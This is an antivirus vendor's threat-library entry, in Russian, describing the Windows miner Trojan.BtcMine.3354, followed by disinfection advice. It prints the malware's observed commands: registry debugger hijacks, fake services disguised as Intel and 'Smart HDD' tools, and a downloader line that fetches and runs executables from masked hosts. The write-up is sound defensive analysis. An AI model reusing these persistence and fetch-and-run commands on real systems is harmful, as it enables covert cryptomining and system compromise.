Защити созданное

Другие наши ресурсы

  • free.drweb.ru — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.ru — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.ru/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

Чтобы добавить ресурс в библиотеку, войдите в аккаунт.

+ Добавить в библиотеку

Ресурсов: -

Последний: -

Моя библиотека

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.BtcMine.3354

Добавлен в вирусную базу Dr.Web: 2019-08-25

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe] 'debugger' = 'fixmapi.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt.exe] 'debugger' = 'fixmapi.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe] 'debugger' = 'fixmapi.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt] 'debugger' = 'fixmapi.exe'
Создает или изменяет следующие файлы
  • %WINDIR%\temp\gentee00\russian.lng
  • %WINDIR%\twunk_32.ini
Создает следующие сервисы
  • [<HKLM>\System\CurrentControlSet\Services\HddSmart] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\HddSmart] 'ImagePath' = '%WINDIR%\shdd\hddsvc.exe'
  • [<HKLM>\System\CurrentControlSet\Services\intelrd] 'Start' = '00000002'
  • [<HKLM>\System\CurrentControlSet\Services\intelrd] 'ImagePath' = '%WINDIR%\SoftwareDistribution\intl.exe'
Вредоносные функции
Запускает на исполнение
  • '<SYSTEM32>\taskkill.exe' /f /im hostdl.exe /T
  • '<SYSTEM32>\taskkill.exe' /f /im renimin.exe /T
  • '<SYSTEM32>\taskkill.exe' /f /im renim.exe /T
  • '<SYSTEM32>\taskkill.exe' /f /im renims.exe
  • '<SYSTEM32>\taskkill.exe' /f /im hddsmart.exe
  • '<SYSTEM32>\taskkill.exe' /f /im hddsvc.exe
  • '<SYSTEM32>\taskkill.exe' /f /im shaht.exe
  • '<SYSTEM32>\taskkill.exe' /f /im renimin.exe
  • '<SYSTEM32>\taskkill.exe' /f /im intelrd.exe
  • '<SYSTEM32>\taskkill.exe' /f /im winmgmnt.exe
  • '<SYSTEM32>\taskkill.exe' /f /im intl.exe /T
  • '<SYSTEM32>\taskkill.exe' /f /im intl.exe
  • '<SYSTEM32>\taskkill.exe' /f /im defender.exe
  • '<SYSTEM32>\taskkill.exe' /f /im hostdl.exe
  • '<SYSTEM32>\taskkill.exe' /f /im renim.exe
  • '<SYSTEM32>\taskkill.exe' /f /im intelrd.exe /T
  • '<SYSTEM32>\net.exe' stop intelrd
Завершает или пытается завершить
следующие системные процессы:
  • <SYSTEM32>\cmd.exe
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\gentee00\pauto.dll
  • %WINDIR%\intel\mnzk9.dat
  • %WINDIR%\intel\renim.exe
  • %WINDIR%\intel\intelrd.exe
  • %WINDIR%\softwaredistribution\shaht.exe
  • <SYSTEM32>\instsrv.exe
  • %WINDIR%\shdd\instsrv.exe
  • %WINDIR%\shdd\hddsvc.exe
  • %WINDIR%\shdd\hddsmart.exe
  • %WINDIR%\shdd\ins.bat
  • %WINDIR%\shdd\hddsmart.bat
  • %WINDIR%\intel\mnzk10.dat
  • %WINDIR%\softwaredistribution\restr.exe
  • %WINDIR%\softwaredistribution\noerr.fta
  • %WINDIR%\softwaredistribution\intlu.exe
  • %WINDIR%\softwaredistribution\sfxd.exe
  • %WINDIR%\softwaredistribution\errchk.bat
  • %WINDIR%\softwaredistribution\wmine.exe
  • %WINDIR%\softwaredistribution\instsrv.exe
  • %WINDIR%\softwaredistribution\intl.bat
  • %WINDIR%\softwaredistribution\inst.bat
  • <Текущая директория>\new.exe
  • %TEMP%\gentee00\russian.lng
  • %WINDIR%\sfxd.exe
  • %WINDIR%\temp\gentee00\pauto.dll
Присваивает атрибут 'скрытый' для следующих файлов
  • %WINDIR%\shdd\hddsmart.bat
  • %WINDIR%\intel\renim.exe
  • %WINDIR%\softwaredistribution\intl.bat
Удаляет следующие файлы
  • <Текущая директория>\new.exe
  • %WINDIR%\softwaredistribution\instsrv.exe
  • %WINDIR%\softwaredistribution\wmine.exe
  • %WINDIR%\softwaredistribution\restr.exe
  • %WINDIR%\softwaredistribution\errchk.bat
  • %WINDIR%\twunk_32.ini
Перемещает следующие файлы
  • %WINDIR%\softwaredistribution\intlu.exe в %WINDIR%\softwaredistribution\intl.exe
  • %WINDIR%\shdd\hddsmart.exe в %WINDIR%\hddsmart.exe
  • %WINDIR%\shdd\instsrv.exe в %WINDIR%\instsrv.exe
Сетевая активность
TCP
Запросы HTTP GET
  • http://in###of.design/umnd.inf
  • http://re####aht.dsmtp.biz/renimin.tot
  • http://in###of.design/filsiz.inf
  • http://re####aht.dsmtp.biz/restr.exe
  • http://re####aht.dsmtp.biz/shaht.exe
  • http://in###of.design/what.inf
UDP
  • DNS ASK in###of.design
  • DNS ASK re####aht.dsmtp.biz
Другое
Ищет следующие окна
  • ClassName: 'EDIT' WindowName: ''
  • ClassName: '' WindowName: ''
Создает и запускает на исполнение
  • '<Текущая директория>\new.exe'
  • '%WINDIR%\softwaredistribution\wmine.exe' -c http://re####aht.dsmtp.biz/restr.exe
  • '%WINDIR%\softwaredistribution\restr.exe'
  • '%WINDIR%\instsrv.exe' HddSmart %WINDIR%\shdd\hddsvc.exe
  • '%WINDIR%\shdd\hddsvc.exe'
  • '%WINDIR%\softwaredistribution\wmine.exe' -c http://re####aht.dsmtp.biz/shaht.exe
  • '%WINDIR%\softwaredistribution\shaht.exe'
  • '%WINDIR%\hddsmart.exe' -t36832 %WINDIR%\shdd\hddsmart.bat
  • '%WINDIR%\softwaredistribution\instsrv.exe' intelrd %WINDIR%\SoftwareDistribution\intl.exe
  • '%WINDIR%\softwaredistribution\intl.exe'
  • '%WINDIR%\softwaredistribution\sfxd.exe' /cn /mn %WINDIR%\intel\
  • '%WINDIR%\softwaredistribution\sfxd.exe' /co /mo %WINDIR%\shdd\
  • '%WINDIR%\sfxd.exe' /co /mo %WINDIR%\SoftwareDistribution\
  • '%WINDIR%\intel\intelrd.exe'
  • '<SYSTEM32>\cmd.exe' /c del /f /q new.exe' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /e:ON /v:ON /c "SETLOCAL EnableDelayedExpansion & set /a M=%NUMBER_OF_PROCESSORS%/2 & <nul set /p =!M!>%windir%\twunk_32.ini"' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c start new.exe
  • '<SYSTEM32>\cmd.exe' /c %WINDIR%\shdd\hddsmart.bat
  • '<SYSTEM32>\ping.exe' -n 2 127.0.0.1
  • '<SYSTEM32>\ping.exe' 127.0.0.1 -n 6
  • '<SYSTEM32>\sc.exe' start intelrd
  • '<SYSTEM32>\sc.exe' stop HddSmart
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Description" /t REG_SZ /d "The service allows you to speed up the work of hard drives, as well as protecting against breakage and loss o...
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "DisplayName" /t REG_SZ /d "Intel Rapid Storage Technology" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Start" /t REG_DWORD /d "2" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Type" /t REG_DWORD /d "16" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ErrorControl" /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd\Parameters" /v "Application" /t REG_SZ /d "%WINDIR%\SoftwareDistribution\intl.bat" /f
  • '<SYSTEM32>\net1.exe' stop intelrd
  • '<SYSTEM32>\sc.exe' config intelrd DisplayName= "Intel Rapid Storage Technology"
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intelrd.exe" /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intl.exe" /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renim.exe" /f
  • '<SYSTEM32>\attrib.exe' +h +s %WINDIR%\intel\renim.exe
  • '<SYSTEM32>\attrib.exe' +h +s intl.bat
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intelrd.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renim.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renims.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\cmd.exe' /c %WINDIR%\SoftwareDistribution\intl.bat
  • '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
  • '<SYSTEM32>\sc.exe' start HddSmart
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ImagePath" /t REG_EXPAND_SZ /d "%WINDIR%\SoftwareDistribution\intl.exe" /f
  • '<SYSTEM32>\attrib.exe' +h +s %WINDIR%\shdd\hddsmart.bat
  • '<SYSTEM32>\attrib.exe' -h -s %WINDIR%\shdd\hddsmart.bat
  • '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\SoftwareDistribution\errchk.bat" "
  • '<SYSTEM32>\cmd.exe' /c wmic cpu get NumberOfLogicalProcessors,Version
  • '<SYSTEM32>\wbem\wmic.exe' cpu get NumberOfLogicalProcessors,Version
  • '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\SoftwareDistribution\inst.bat" "
  • '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Host-process" /f
  • '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
  • '<SYSTEM32>\attrib.exe' -h -s -r %WINDIR%\intel\renim.exe
  • '<SYSTEM32>\ping.exe' 127.0.0.1 -n 3
  • '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\shdd\ins.bat" "
  • '<SYSTEM32>\ping.exe' 127.0.0.1 -n 7
  • '<SYSTEM32>\ping.exe' 127.0.0.1 -n 2
  • '<SYSTEM32>\cmd.exe' /c del /f /q new.exe
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Description" /t REG_SZ /d "Service for determining the performance of hard disks and defragmenting the file system. SMARTHDD allows you...
  • '<SYSTEM32>\ping.exe' 127.0.0.1 -n 1
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "DisplayName" /t REG_SZ /d "Smart HDD" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Start" /t REG_DWORD /d "2" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Type" /t REG_DWORD /d "16" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ErrorControl" /t REG_DWORD /d "1" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ImagePath" /t REG_EXPAND_SZ /d "%WINDIR%\shdd\hddsvc.exe" /f
  • '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart\Parameters" /v "Application" /t REG_SZ /d "%WINDIR%\shdd\hddsmart.bat" /f
  • '<SYSTEM32>\sc.exe' config HddSmart DisplayName= "Smart HDD"
  • '<SYSTEM32>\cmd.exe' /e:ON /v:ON /c "SETLOCAL EnableDelayedExpansion & set /a M=%NUMBER_OF_PROCESSORS%/2 & <nul set /p =!M!>%windir%\twunk_32.ini"

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Российский разработчик антивирусов Dr.Web
Опыт разработки с 1992 года
Dr.Web пользуются в 200+ странах мира
Dr.Web в Реестре Отечественного ПО
Более 71% дохода компании — продажи бизнес-клиентам
Круглосуточная поддержка на русском языке

Dr.Web © «Доктор Веб»
2003 — 2020

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125124, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А

Обработка ПД